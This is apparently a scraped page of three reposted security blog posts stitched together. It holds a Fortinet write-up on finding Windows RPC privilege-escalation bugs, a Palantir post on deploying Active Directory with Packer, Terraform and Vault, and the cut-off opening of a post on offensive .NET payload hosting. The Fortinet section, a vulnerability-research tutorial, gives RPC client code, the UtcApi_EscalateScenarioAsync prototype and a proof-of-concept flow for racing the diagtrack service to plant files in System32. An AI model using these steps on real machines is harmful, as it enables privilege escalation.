RPC Bug Hunting Case Studies

( Original text by Wayne Chin Yick Low )

In late August of 2018, a Windows local privilege escalation zero-day exploit was released by a researcher who goes with the Internet moniker SandboxEscaper. In less than two weeks from the time the zero-day was published on Internet, the exploit was picked up by malware authors. as stated by ESET, and caused a bit of chaos in the InfoSec community. This incident also raised FortiGuard Labs’ awareness.

FortiGuard Labs believes that understanding how this attack works will significantly help other researchers find vulnerabilities similar to the bug that SandboxEscaper found in the Windows Task Scheduler. In this blog post, we will discuss our approach to finding privilege escalation by abusing a symbolic link on an RPC server.

It turns out that Windows Task Scheduler had flaws in one of its Remote Procedure Calls (RPC) Application Programming Interfaces (API) exposed via an RPC server. The fact is, most RPC servers are hosted by system processes running with local system privilege, and allow RPC clients with lower privilege to interact with them. As with other software, these RPC servers might be susceptible to software issues like denial of service, memory corruption, and logical errors, etc. In other words, an attacker could leverage any vulnerabilities that might exist in an RPC servers.

One of the reasons this zero-day exploit became so popular so quickly is because the underlying vulnerability is so simple to exploit. It is caused by a program logic error which is relatively easy to spot when the correct tools and techniques are used. This particular kind of privilege escalation vulnerability is typically exploited using a bogus symbolic link to escalate files or folders, that in turn could result in privilege elevation for a normal user. For those interested, there are plenty of resources about symbolic link attacks that have been shared by James Forshaw from Google Project Zero.

RPC Server Runtime and Static Analysis Prerequisites

When conducting a new research topic, it is always a good idea to look around to see if there is any available open source tool you can leverage before writing your own tool from scratch. Fortunately, Microsoft RPC is a well-known protocol and has been well reverse-engineered by researchers over the past couple of decades. As a result, researchers have open-sourced a tool named RpcView, which is a very handy tool for identifying RPC services running on the Windows Operating System. This is definitely one of my favourite RPC tools, with many useful features such as searching the RPC interface Universal Unique Identifier (UUID), RPC interface names, etc.

However, it does not serve our purpose here to decompile and export all the RPC information into a text file. Fortunately, upon reading the source code we found that the authors have included the functionality we need, but it is not enabled by default and can only be triggered in debug mode with a specific command line parameter. Because of this limitation, we enabled and adapted the existing DecompileAllInterfaces function into an RpcView GUI. If you are interested in using this feature, our custom RpcView tool is available on our Github repository. We can now discuss the benefit of the “Decompile All Interfaces” feature in the next section.

Fortinet FortiGuard Labs Threat Research

Figure 1: RpcView Decompile All Interfaces feature

When analysing the behaviours of an RPC server, we always call the APIs exposed via the RPC interface. Such interaction with an RPC server of interest can be achieved by sending an RPC request via the RPC Client to the server and then observing its behaviours using the Process Monitor tool in SysInternals. In my opinion, the most convenient way to do this is by scripting rather than writing a C/C++ RPC client that requires program compilation, which is time consuming.

Instead, we are going to use PythonForWindows. It provides abstractions around some of the Windows features in a pythonic way, which relies heavily on Python’s ctypes. It also consists of an RPC library which provides some convenient wrapper functions that save us time when writing the RPC client. For example, a typical RPC client binary needs to define the interface definition language, and you need to manually implement the binding operation, which usually involves some C++ codes. See Listing 1 and Listing 2, below, that illustrate the difference between scripting and programming the RPC client with minimal error handling code. 


import sys
import ctypes
import windows.rpc
import windows.generated_def as gdef
from windows.rpc import ndr

StorSvc_UUID = r"BE7F785E-0E3A-4AB7-91DE-7E46E443BE29"

class SvcSetStorageSettingsParameters(ndr.NdrParameters):
MEMBERS = [ndr.NdrShort, ndr.NdrLong, ndr.NdrShort, ndr.NdrLong]

def SvcSetStorageSettings():
print "[+] Connecting...."
client = windows.rpc.find_alpc_endpoint_and_connect(StorSvc_UUID, (0,0))
print "[+] Binding...."
iid = client.bind(StorSvc_UUID, (0,0))
params = SvcSetStorageSettingsParameters.pack([0, 1, 2, 0x77])
print "[+] Calling SvcSetStorageSettings"
result = client.call(iid, 0xb, params)
if len(str(result)) > 0:
print " [*] Call executed successfully!"
stream = ndr.NdrStream(result)
res = ndr.NdrLong.unpack(stream)
if res == 0:
print " [*] Success"
else:
print " [*] Failed"

if __name__ == "__main__":
SvcSetStorageSettings()
Copy

Listing 1: SvcSetStorageSettings using PythonForWindows RPC Client


RPC_STATUS CreateBindingHandle(RPC_BINDING_HANDLE *binding_handle)
{
RPC_STATUS status;
RPC_BINDING_HANDLE v5;
RPC_SECURITY_QOS SecurityQOS = {};
RPC_WSTR StringBinding = nullptr;
RPC_BINDING_HANDLE Binding;

StringBinding = 0;
Binding = 0;
status = RpcStringBindingComposeW(L"BE7F785E-0E3A-4AB7-91DE-7E46E443BE29", L"ncalrpc", nullptr, nullptr, nullptr,&StringBinding);
if (status == RPC_S_OK)
{
status = RpcBindingFromStringBindingW(StringBinding, &Binding);
RpcStringFreeW(&StringBinding);
if (!status)
{
SecurityQOS.Version = 1;
SecurityQOS.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;
SecurityQOS.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT;
SecurityQOS.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;

status = RpcBindingSetAuthInfoExW(Binding, 0, 6u, 0xAu, 0, 0, (RPC_SECURITY_QOS*)&SecurityQOS);
if (!status)
{
v5 = Binding;
Binding = 0;
*binding_handle = v5;
}
}
}

if (Binding)
RpcBindingFree(&Binding);
return status;
}

VOID RpcSetStorageSettings()
{
RPC_BINDING_HANDLE handle;
RPC_STATUS status = CreateBindingHandle(&handle);

if (status != RPC_S_OK)
{
_tprintf(TEXT("[-] Error creating handle %d\n"), status);
return;
}

RpcTryExcept
{
if (!SUCCEEDED(SvcSetStorageSettings(0, 1, 2, 0x77))
{
_tprintf(TEXT("[-] Error calling RPC API\n"));
return;
}

}
RpcExcept(1)
{

RpcStringFree(&instanceid);

}
RpcEndExcept
}
Copy

Listing 2: SvcSetStorageSettings using C++ RPC Client

After the RPC client has successfully executed the corresponding RPC API, we used the Process Monitor to monitor its activities. Process Monitor is helpful in dynamic analysis as it provides event-based API runtime information. It is worth mentioning that one of the probably lesser known features of Process Monitor is its call-stack information, as shown in Figure 2, which enables you to trace the API calls of an event.

Fortinet FortiGuard Labs Threat Research

Figure 2: Process Monitor API call-stack

We can use the Address and Path information to pinpoint exactly the corresponding module and function routine when doing static analysis via a disassembler like IDA Pro, for instance. This is useful because sometimes you might not be able to spot the potential symbolic link attack patterns using the Process Monitor output alone. This is why static analysis via disassembler comes into play in helping us in discovering race condition issues, which will be discussed in the second part of this blog series.

Microsoft Universal Telemetry Client (UTC) Case Study

Have you ever heard that Microsoft is collecting customer information, data, and file starting details on Windows 10 and above? Have you ever wondered how this works? If you are interested, you can read about it in this excellent article about the mechanism behind UTC.

To start the next phase of our analysis, we first exported all the RPC interfaces from the RpcView GUI to text files. The resulting text files consisted of all the RPC APIs that were callable from the RPC Servers. From the output text files we then looked for the RPC APIs that accept wide string as input until we encountered one of the more interesting RPC interfaces from diagtrack.dll. Later, we confirmed that this DLL component is responsible for the implementation of UTC functionality, especially when judging from the name Microsoft Windows Diagnostic Tracking, from its description shown in the RpcView GUI.

Fortinet FortiGuard Labs Threat Research

Figure 3: RpcView reveals UTC’s DLL component, and one of its RPC interfaces accepts wide string as input

Keep in mind that our goal here is to find the API that could possibly accept an input file path that could eventually lead to privilege escalation, as demonstrated by the Windows Task Scheduler bug. But that requirement alone gives us 16 possible APIs, as shown in Figure 3. Obviously, we need to filter out those APIs that are out of our interest. So we used IDA Pro and started with static analysis to find out which API we should dive into.

I normally first locate the RPC function RpcServerRegisterIf, which is typically used to register an interface specification over RPC server. The interface specification contains the definition of the RPC interface hosted by a particular RPC server. According to the MSDN document, the interface specification is located in the first parameter of the function, which is represented by the RPC_SERVER_INTERFACE data structure with the following definition:


struct _RPC_SERVER_INTERFACE
{
unsigned int Length;
RPC_SYNTAX_IDENTIFIER InterfaceId;
RPC_SYNTAX_IDENTIFIER TransferSyntax;
PRPC_DISPATCH_TABLE DispatchTable;
unsigned int RpcProtseqEndpointCount;
PRPC_PROTSEQ_ENDPOINT RpcProtseqEndpoint;
void *DefaultManagerEpv;
const void *InterpreterInfo;
unsigned int Flags;
};
Copy

The InterpreterInfo of the interface specification is a pointer to the MIDL_SERVER_INFO data structure, which consists of a DispatchTable pointer that keeps the information of the interface APIs supported by the specific RPC interface. This is indeed the field we are looking for.


typedef struct _MIDL_SERVER_INFO_
{

PMIDL_STUB_DESC pStubDesc;
const SERVER_ROUTINE* DispatchTable;
PFORMAT_STRING ProcString;
const unsigned short* FmtStringOffset;
const STUB_THUNK* ThunkTable;
PRPC_SYNTAX_IDENTIFIER pTransferSyntax;
ULONG_PTR nCount;
PMIDL_SYNTAX_INFO pSyntaxInfo;
} MIDL_SERVER_INFO, *PMIDL_SERVER_INFO;
Copy

Figure 4 is an animation that illustrates how we typically traverse the import address table to determine the DispatchTable within IDA Pro.

Fortinet FortiGuard Labs Threat Research

Figure 4: Determining RPC exposed APIs by traversing IAT within IDA Pro

After we have determined the UTC’s interface APIs with the UtcApi prefix, as shown in Figure 4, we tried to determine if any of these interface APIs would lead to any Access Control List (ACL) APIs, such as SetNamedSecurityInfo and SetSecurityInfo. We are interested in these ACL APIs because they are used in changing the discretionary access control (DACL) security descriptor of an object, whether it’s a file, directory, or registry object. Another useful feature in IDA Pro that is probably underused is its proximity view, which shows you a call-graph of a function routine that will be displayed in a graph form. We used the proximity view to find the function routine that is being referenced or called by the ACL APIs mentioned above.

Fortinet FortiGuard Labs Threat Research

Figure 5: IDA’s Proximity view that shows the correlation between SetSecurityInfo and the function routines in diagtrack.dll

However, IDA Pro did not yield any results when we tried to look for the correlation between SetSecurityInfo and UtcApi. Digging further, we found out that the UtcApi placed the client’s RPC request into the workitem queue that will be processed by asynchronous thread. As shown in Figure 5, SetSecurityInfo will be executed when Microsoft::Diagnostic::EscalationWorkItem::Execute is triggered. Basically, this is a call-back function that is responsible for executing escalation requests kept in the work item submitted by the RPC client.

At this point, we needed to figure out how to submit an escalation request. After playing around with various applications, we came across Microsoft Feedback Hub, which is a Universal Windows Platform (UWP) application that comes by default on Windows 10. Sometimes, you might find it useful to debug a UWP application. Unfortunately, you cannot open or attach a UWP application directly under WinDbg and expect it to work magically. However, UWP application debugging can be enabled via PLMDebug tool that comes with Window Debugger included in Windows 10 SDK. You can first determine the full package family name of the Feedback Hub via the Powershell built-in cmdlet:


PS C:\Users\researcher> Get-AppxPackage | Select-String -pattern "Feedback"
Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe
PS C:\Users\researcher> cd "c:\Program Files\Windows Kits\10\Debuggers\x86"
PS C:\Program Files\Windows Kits\10\Debuggers\x86>
PS C:\Program Files\Windows Kits\10\Debuggers\x86> .\plmdebug.exe /query
Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe
Package full name is Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe.
Package state: Unknown
SUCCEEDED
PS C:\Program Files\Windows Kits\10\Debuggers\x86>
Copy

After we obtained full package name, we enables UWP debugging for the Feedback Hub using PLMDebug again:


c:\Program Files\Windows Kits\10\Debuggers\x86>plmdebug.exe /enabledebug Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe "c:\program files\windows kits\10\Debuggers\x86\windbg.exe"
Package full name is Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe.
Enable debug mode
SUCCEEDED
Copy

The next time you launch the Feedback Hub, the application will be executed and attached to WinDbg automatically.

Fortinet FortiGuard Labs Threat Research

Figure 6: Determining the offset of the API call from Process Monitor Event Properties

After we’d launched the Feedback Hub, we followed the on-screen instructions from the application and we started seeing activities in the Process Monitor. This is a good sign, as it implies that we are on track. When we then looked into the call-stack of the highlighted SetSecurityFile event, we found the return address of the ACL API SetSecurityInfo at offset 0x15A091 (the base address of diagtrack.dll can be found in Process tab of Event Properties). As you can see, this offset falls within the routine Microsoft::Diagnostics::Utils::FileSystem::SetTokenAclOnFile, as shown under the disassembler in Figure 6, and that also appears in the proximity view demonstrated in Figure 5. This proves that we can utilize the Feedback Hub to reach our desired code path.

In addition to that, the Process Monitor output also told us that this event attempts to set the DACL of the file object, but determining how the file object was derived by doing code static analysis might be time-consuming. Fortunately, we can attach a local debugger to the svchost.exe program that was hosting the UTC service that was given administrative rights because the process is not protected by the Protected Process Light (PPL) mechanism. This gives us the flexibility to dynamically debug the UTC service to understand how the file path was retrieved.

Under the hood, all feedback details and attachments will be kept in a temporary folder with the format %DOCUMENTS%\FeedbackHub\<guid>\diagtracktempdir<random_decimals> after you have submitted it via the Feedback Hub. The random decimal number appended to diagtracktempdir is generated via the BCryptGenRandom API, which means that the generated number is literary unpredictable. But one of the most important criteria in a symbolic link attack is to be able to predict the file or folder name, so the random diagtracktempdir name increases the difficultly of exploiting the symbolic link vulnerability. Therefore, we dove into other routines to find other potential issues.

While we were trying to understand how the diagtracktempdir security descriptor is set, we realized that the folder will be created with the explicit security descriptor string of O:BAD:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY), which implies that the DACL of the object will be granted for Administrator and local system user access only. However, the explicit security descriptor will be ignored if the following registry key is set accordingly:

HKEY_LOCAL_MACHINE\Software\Microsoft\Diagnostics\DiagTaskTestHooks\Volatile

“NoForceCopyOutputDirAcl” = 1

In a nutshell, diagtracktempdir will be enforced to use an explicit security descriptor when the above registry key is not present, otherwise the default DACL will be applied to the folder that could potentially raise some security issues, as there is no impersonation token being used during folder creation. Nevertheless, you can bypass the explicit security descriptor to this folder if you have an arbitrary registry write vulnerability. But this is not what we are pursuing, so our best bet is to look into the Process Monitor again:

Fortinet FortiGuard Labs Threat Research

Figure 7: Setting DACLs and renaming folder diagtracktempdir

Basically we can summarize the operations labelled in Figure 7 as follows:

1.     Grant access to the current logged-in user on diagtracktempdir under local system privilege

2.     Rename diagtracktempdir to the GUI-styled folder under impersonation

3.     Revoke access of the current logged-in user on diagtracktempdir under impersonation

The following code snippet corresponds to the operations shown in Figure 7:


bQueryTokenSuccessful = UMgrQueryUserToken(hContext, v81, &amp;hToken);
if ( hToken &amp;&amp; hToken != -1 )
{
// This will GRANT access of the current logged in user to the directory in the specified handle
bResultCopyDir = Microsoft::Diagnostics::Utils::FileSystem::SetTokenAclOnFile(&amp;hToken, hDir, Sid, GRANT_ACCESS)
if ( !ImpersonateLoggedOnUser(hToken) )
{
bResultCopyDir = 0x80070542;
}
}
// Rename diagtracktempdir to GUID-styled folder name
bResultCopyDir = Microsoft::Diagnostics::Utils::FileSystem::MoveFileByHandle(SecurityDescriptor, v65, Length);
if ( bResultCopyDir &gt;= 0 )
{
boolRenamedSuccessful = 1;
// This will REVOKE access of the current logged in user to the directory in the specified handle
bSetAclSucessful = Microsoft::Diagnostics::Utils::FileSystem::SetTokenAclOnFile(&amp;hToken, hDir, Sid, REVOKE_ACCESS)if (bSetAclSucessful)
{
// Cleanup and RevertToSelf
return;
}
}
else
{
lambda_efc665df8d0c0615e3786b44aaeabc48_::operator_RevertToSelf(&amp;hTokenUser);
// Delete diagtracktempdir folder and its contents
lambda_8963aeee26028500c2a1af61363095b9_::operator_RecursiveDelete(&amp;v83);
}
Copy

Listing 3: Grant and then revoke access on diagtracktempdir

From Listing 3, we can tell when the file rename operation failed. If the bResultCopyDir has a value of less than 0, it will proceed to the RecursiveDelete function call. It is also worth noting that it calls the RevertToSelf function to terminate the impersonation before the RecursiveDeletefunction is called, which means the target directory and its contents can be deleted under local system privilege, that would allow us to achieve arbitrary files deletion if we managed to use a symbolic link to redirect the diagtracktempdir to an arbitrary folder. Fortunately, Microsoft has mitigated the potential reparse point deletion issues. This RecursiveDelete function has explicitly skipped any directory or folder that has the FILE_ATTRIBUTE_REPARSE_POINT flag set, which is typically set for a junction folder. So we can confirm that this recursive deletion routine does not pose any security risks.

Since we are not able to demonstrate arbitrary file deletion, we decided to show off how to write arbitrary files to diagtracktempdir directory. Looking into the code, we realized that UTC service does not revoke the security descriptor of the diagtracktempdir for a currently logged in userafter the recursive deletion routine has completed. This is intentional, because you do not need to impose a new DACL to a folder that is going to be removed, which is redundant work. But this has also opened up a potential race condition opportunity for the attacker to prevent the deletion of the escalated diagtracktempdir by creating a file with an exclusive file handle in the same directory.  The RecursiveDelete function encounters a sharing violation when attempting to open and delete the file with an exclusive file handle and then exit the operation gracefully. After all, the attacker could drop and execute files in the escalated diagtracktetempdir in a restricted directory, for example C:\WINDOWS\System32.

So the next question is, how did we make the file rename operation fail? Looking into the underlying implementation of Microsoft::Diagnostics::Utils::FileSystem::MoveFileByHandle, we see that it is essentially a wrapper function calling the SetFileInformationByHandleAPI. It appears that the underlying kernel functions derived from this API will always obtain the file handle of the parent directory with write access. For example, if the handle is currently referenced to c:\blah\abc it will attempt to get the file handle with write access of c:\blah. However, if we specify a directory in which the current logged in user has no write access to, Microsoft::Diagnostics::Utils::FileSystem::MoveFileByHandle could fail to execute properly. The following file paths are good candidates, as they are known to be restricted folders that disallow folder creation for a normal user account:

·       C:\WINDOWS\System32

·       C:\WINDOWS\tasks

There should not be any problem of winning this race condition as some of the escalation requests involve writing a bunch of log files to our controlled diagtracktempdir and they will take some time to be deleted. So we should be able to win the race most of the time in a modern system with multiple cores if we have successfully created an exclusive file handle in our target directory.

Next, we need to find ways to trigger the code path programmatically using the correct parameters required by UtcApi. Being able to debug and set the breakpoint on the RPC function, the NdrClientCall within the Feedback Hub really makes our life easier. The debugger reveals the scenario ID as well as the escalation path that we should send to UtcApi. In this case, we are going to use the scenario ID {1881A45E-01FD-4452-ACE4-4A23666E66E3} as it seems to consistently show up whenever the UtcApi_EscalateScenarioAsync routine is triggered, and it has led to our desired code path on the RPC Server. Take note that the escalation path has also allowed us to control where diagtracktempdir will be created.


Breakpoint 0 hit
eax=0c2fe7b8 ebx=032ae620 ecx=0e8be030 edx=00000277 esi=0c2fe780 edi=0c2fe744
eip=66887154 esp=0c2fe728 ebp=0c2fe768 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
Helper+0x37154:
66887154 ff15a8f08866 call dword ptr [Helper!DllGetActivationFactory+0x6d31 (6688f0a8)] ds:0023:6688f0a8={RPCRT4!NdrClientCall4 (76a74940)}
0:027&gt; dds esp l9
0c2fe728 66892398 Helper!DllGetActivationFactory+0xa021
0c2fe72c 66891dca Helper!DllGetActivationFactory+0x9a53
0c2fe730 0e8be030
0c2fe734 1881a45e // Scenario ID
0c2fe738 445201fd
0c2fe73c 234ae4ac
0c2fe740 e3666e66
0c2fe744 00000000
0c2fe748 032ae620 // Escalation path
0:027&gt; du 032ae620
032ae620 "E:\researcher\Documents\Feedback"
032ae660 "Hub\{e04b7a09-02bd-42e8-a5a8-666"
032ae6a0 "b5102f5de}\{e04b7a09-02bd-42e8-a"
032ae6e0 "5a8-666b5102f5de}"
Copy

As a result, the prototype of UtcApi_EscalateScenarioAsync looks like the following:


long UtcApi_EscalateScenarioAsync (
[in] GUID SecnarioID,
[in] int16 unknown,
[in] wchar_t* wszEscalationPath
[in] long unknown2,
[in] long unknown3,
[in] long num_of_keyval_pairs,
[in] wchar_t **keys,
[in] wchar_t **values)
Copy

Putting all of this together, our proof of concept (PoC) flows like this:

  • Create an infinite thread that will monitor our target directory, eg: C:\WINDOWS\SYSTEM32, in order to capture the folder name of diagtracktempdir
  • Create another infinite thread that will create an exclusive file handle into C:\WINDOWS\SYSTEM32\diagtracktempdir{random_decimal}\z
  • Call UtcApi_EscalateScenarioAsync(1881A45E-01FD-4452-ACE4-4A23666E66E3) to trigger Microsoft::Diagnostic::EscalationWorkItem::Execute
  • C:\WINDOWS\SYSTEM32\diagtracktempdir{random_decimal}\z will have been created successfully if we have won the race
  • After that, the attacker can write and execute arbitrary files to the escalated folder C:\WINDOWS\SYSTEM32\diagtracktempdir{random_decimal} to bypass legitimate programs that have always assumed that %SYSTEM32% directory contains only legitimate OS files

The result of our PoC demonstrates the potential ways to create arbitrary files and folders in a static folder under a restricted directory by leveraging the UTC service.

Fortinet FortiGuard Labs Threat Research

Figure 8: PoC allowed creating arbitrary files in diagtracktempdir

To reiterate, this PoC does not pose a security risk to Windows OS without also being able to control or rename the folder diagtracktempdir, as stated by the MSRC. However, it is common to see malware authors utilizing different techniques such as User Account Control (UAC) bypass in order to write files to a Windows system folder with the intention of bypassing a delicate heuristic detector. In fact, while exploring the potential file paths to be used in the PoC, we found that C:\WINDOWS\SYSTEM32\Tasks contains write and execute permissions for normal user accounts. but without read permission—which is why this folder is also one of the notorious target paths for malware authors to store malicious files.

Conclusion

In this first part of the blog series, we have shown you our approach to finding a potential security risk in a Windows RPC Server using different available tools and online resources. We also demonstrated some of the fundamental knowledge you need to reverse-engineer an RPC Server. We strongly believe there are still other potential security risks in the RPC Server. As a result, we are determined to harden Windows RPC Servers further. In the second part of this blog series, we will continue our investigation and improve our methodology that will lead us to uncover other RPC Server vulnerabilities.

Active Directory as Code

( Original text by Palantir )

Windows Automation used to be hard, or at least not straightforward, manifesting itself in right-click-to-glory deployments where API-based management was a second thought. But the times, they are a-changin’! With the rise of DevOps, the release of Windows Server 2016, and the growth of the PowerShell ecosystemopportunities to redesign traditional Windows infrastructure have opened up.

One of the more prevalent Windows-based systems is Active Directory (AD) — a cornerstone in most enterprise environments which, for many, has remained an on-premise installation. At Palantir, we ❤️ Infrastructure as Code (see Terraforming Stackoverflow and Bouncer), so when we were tasked with deploying an isolated, highly available, and secure AD infrastructure in AWS, we started to explore ways we can apply Infrastructure as Code (IaC) practices to AD. The goal was to make AD deployments automated, repeatable, and configured by code. Additionally, we wanted any updates tied to patch and configuration management integrated with our CI/CD pipeline.

This post walks through the approach we took to solve the problem by outlining the deployment process including building AD AMIs using Packer, configuring the AD infrastructure using Terraform, and storing configuration secrets in Vault.

Packerizing Active Directory

Our approach to Infrastructure as Code involves managing configuration by updating and deploying layered, immutable images. In our experience, this reduces entropy, codifies configuration, and is more aligned with CI/CD workflows which allows for faster iteration.

Our AD image is a downstream layer on top of our standard Windows image built using a custom pipeline using Packer, Jenkins and AWS CodeBuild. The base image includes custom Desired State Configuration (DSC) modules which manage various components of Windows, Auto Scaling Group (ASG) lifecycle hooks, and most importantly, security tooling. By performing this configuration through the base image, we can enforce security and best practices regardless of how the image is consumed.

Creating a standardized AD image

The AD image can be broken down into the logical components of an instance lifecycle: initial image creation, instance bootstrapping, and decommissioning.

Image creation

It is usually best practice to front-load as much of the logic during the initial build since this process only happens once whereas bootstrapping will run for each instance. This is less relevant when it comes to AD images which tend be lightweight with minimal package dependencies.

Desired State Configuration (DSC) modules

AD configuration has traditionally been a very GUI-driven workflow that has been quite difficult to automate. In recent years, PowerShell has become a robust option for increasing engineer productivity, but managing configuration drift has always been a challenge. Cue DSC modules ????

DSC modules are a great way to configure and keep configured the Windows environment with minimal user interaction. DSC configuration is run at regular intervals on the host and can be used to not only report drift, but to reinforce the desired state (similar to third-party configuration tools). 

One of these modules is the Microsoft AD DSC module. To illustrate how DSC can be a force multiplier, here is a quick example of a group creation invocation. This might seem heavy-handed for a single group, but the real benefit is when you are able to iterate over a list of groups such as below for the same amount of effort. The initial content of 

Groups
 can be specified in a Packer build (static CSV) or generated dynamically from an external look-up.

Sample DSC configuration

<#
.SYNOPSIS
Example demonstrating ingesting a list of N AD groups
and creating their respective resources using a single code
block
        The AD groups can be baked in the AMI or retrieved from an
external source
#>

$ConfigData = @{
AllNodes = @(
@{
NodeName = '*'
Groups = (Get-Content "C:\dsc\groups.csv")
}
)
}

Configuration NodeConfiguration
{
Import-DSCResource -ModuleName xActiveDirectory

Node $AllNodes.NodeName {
foreach ($group in $node.Groups) {
xADGroup $group
{
GroupName = $group
Ensure = "Present"
# additional params
}
}
}
}

NodeConfiguration -ConfigurationData $ConfigData

We have taken this one step further by building additional modules to stand up a cluster from scratch. These modules handle everything from configuring core Windows features to deploying a new domain controller. By implementing these tasks as modules, we get the inherent DSC benefits for free, for instance reboot resilience and mitigation of configuration drift.

Bootstrap scripts

Secrets. A problem like handling configuration secrets like static credentials warrants additional consideration when it comes to a sensitive environment such as AD. Storing encrypted secrets on disk, manually entering them at bootstrap time, or a combination of the two are all sub-optimal solutions. We were looking for a solution that will:

  • Be API-driven so that we can plug it in to our automation
  • Address the secure introduction problem so that only trusted instances are able to gain access
  • Enforce role-based access control to ensure separation between the Administrators (who create the secrets) and instances (that consume the secrets)
  • Enforce a configurable access window during which the instances are able to access the required secrets

Based on the above criteria, we have settled on using Vault to store our secrets for most of our automated processes. We have furthered enhanced it by creating an ecosystem which automates the management of roles and policies, allowing us to grow at scale while minimizing administrative overhead. This allows us to easily permission secrets and control what has access to them and how long by integrating Vault with AWS’ IAM service. This along with proper auditing and controls gives us the best of both worlds: automation and secure secrets management.

Below is an example of how an EC2 instance might retrieve a token from a Vault cluster and use that token to retrieve secrets:

Configuring the instance. AWS ASGs automatically execute the user data (usually a PowerShell script) that is specified in their launch configuration. We also have the option to dynamically pass variables into the script to configure the instance at launch time. As an example, here we are setting the short and full domain names and specifying the Vault endpoint by passing them as arguments for 

bootstrap.ps1
:

Terraform invocation

data "template_file" "userdata" {
template = "${file("${path.module}/bootstrap/bootstrap.ps1")}"

vars {
domain = "${var.domain_name}"
shortname = "${var.domain_short_name}"
vaultaddress = "${var.vault_addr}"
}
}
resource "aws_auto_scaling_group" "my_asg" {
# ...
user_data = "${data.template_file.userdata.rendered}"
}

Bootstrap script (bootstrap.ps1)

<powershell>
Write-Host "My domain name is ${domain} (${shortname})"
Write-Host "I get secrets from ${vaultaddress}"
# ... continue configuration
</powershell>

In addition to ensuring that the logic is correct for configuring your instance, something else that is as equally important is validation to reduce false positives when putting an instance in service. AWS provides a tool for doing this called lifecycle hooks. Since lifecycle hook completions are called manually in a bootstrap script, the script can contain additional logic for validating settings and services before declaring the instance in-service.

Instance clean-up

The final part of the lifecycle that needs to be addressed is instance decommissioning. Launching instances in the cloud gives us tremendous flexibility, but we also need to be prepared for the inevitable failure of a node or user-initiated replacement. When this happens, we attempt to terminate the instance as gracefully as possible. For example, we may need to transfer the Flexible Single-Master Operation (FSMO) role and clean up DNS entries.

We chose to implement lifecycle hooks using a simple scheduled task to check the instance’s state in the ASG. When the state has been set to 

Terminating:Wait
, we run the cleanup logic and complete the terminate hook explicitly. We know that lifecycle hooks are not guaranteed to complete or fire (e.g., when instances experience hardware failure) so if consistency is a requirement for you, you should look into implementing an external cleanup service or additional logic within bootstrapping.

Putting it all together: Terraforming Active Directory

Bootstrapping infrastructure

With our Packer configuration now complete, it is time to use Terraform to configure our AD infrastructure and deploy AMIs. We implemented this by creating and invoking a Terraform module that automagically bootstraps our new forest. Bootstrapping a new forest involves deploying a primary Domain Controller (DC) to serve as the FSMO role holder, and then updating the VPC’s DHCP Options Set so that instances can resolve AD DNS. 

The design pattern that we chose to automate the bootstrapping of the AD forest was to divide the process into two distinct states and switch between them by simply updating the required variables (

lifecycle, configure_dhcp_os
) in our Terraform module and applying it.

Let us take a look at the module invocation in the two states starting with the Bootstrap State where we deploy our primary DC to the VPC:

# Bootstrap Forest
module "ad" {
source = "git@private-github:ad/terraform.git"
    env      = "staging"
mod_name = "MyADForest"
    key_pair_name = "myawesomekeypair"
vpc_id = "vpc-12345"
subnet_ids = ["subnet-54321", "subnet-64533"]
    trusted_cidrs = ["15.0.0.0/8"]
need_trusted_cidrs = "true"
    domain_name       = "ad.forest"
domain_short_name = "ad"
base_fqdn = "DC=ad,DC=forest"
vault_addr = "https://vault.secret.place"
    need_fsmo   = "true"
    # Add me for step 1 and swap me out for step 2
lifecycle = "bootstrap"

# Set me to true when lifecyle = "steady"
configure_dhcp_os = "false"
}

Once the Bootstrap State is complete, we switch to the Steady State where we deploy our second DC and update the DHCP Options Set. The module invocation is exactly the same except for the changes made to the 

lifecycle
and 
configure_dhcp_os
 variables:

# Apply Steady State
module "ad" {
source = "git@private-github:ad/terraform.git"
    env      = "staging"
mod_name = "MyADForest"
    key_pair_name = "myawesomekeypair"
vpc_id = "vpc-12345"
subnet_ids = ["subnet-54321", "subnet-64533"]
    trusted_cidrs = ["15.0.0.0/8"]
need_trusted_cidrs = "true"
    domain_name       = "ad.forest"
domain_short_name = "ad"
base_fqdn = "DC=ad,DC=forest"
vault_addr = "https://vault.secret.place"
    need_fsmo   = "true"

# Add me for step 1 and swap me out for step 2
lifecycle = "steady"
    # Set me to true when lifecyle = "steady"
configure_dhcp_os = "true"
}

Using this design pattern, we were able to automate the entire deployment process and manually transition between the two states as needed. Relevant resources are conditionally provisioned during the two states by making use of the count primitive and interpolation functions in Terraform.

Managing steady state

Once our AD infrastructure is in a Steady state, we update the configuration and apply patches by replacing our instances with updated AMIs using Bouncer. We run Bouncer in serial mode to gracefully decommission a DC and replace it by bringing up a DC with a new image as outlined in the “Instance Clean Up” section above. Once the first DC has been replaced, Bouncer will proceed to cycle the next DC.

Conclusion

Using the above approach we were able to create an isolated, highly-available AD environment and manage it entirely using code. It made the secure thing to do the easy thing to do because we are able to use Git-based workflows, with 2-FA, to gate and approve changes as all of the configuration exists in source control. Furthermore, we have found that this approach of tying our patch management process to our CI/CD pipeline has led to much faster patch compliance due to reduced friction.

In addition to the security wins, we have also improved the operational experience by mitigating configuration drift and being able to rely on code as a source for documentation. It also helps that our disaster recovery strategy for this forest amounts to redeploying the code in a different region. Additionally, benefits like change tracking and peer reviews that have normally been reserved for software development are now also applied to our AD ops processes.

SharpNado — Teaching an old dog evil tricks using .NET Remoting or WCF to host smarter and dynamic payloads

( Original text by Shawn Jones )

Disclaimer:

I am not a security researcher, expert, or guru.  If I misrepresent anything in this article, I assure you it was on accident and I will gladly make any updates if needed.  This is intended for educational purposes only.

TL;DR:

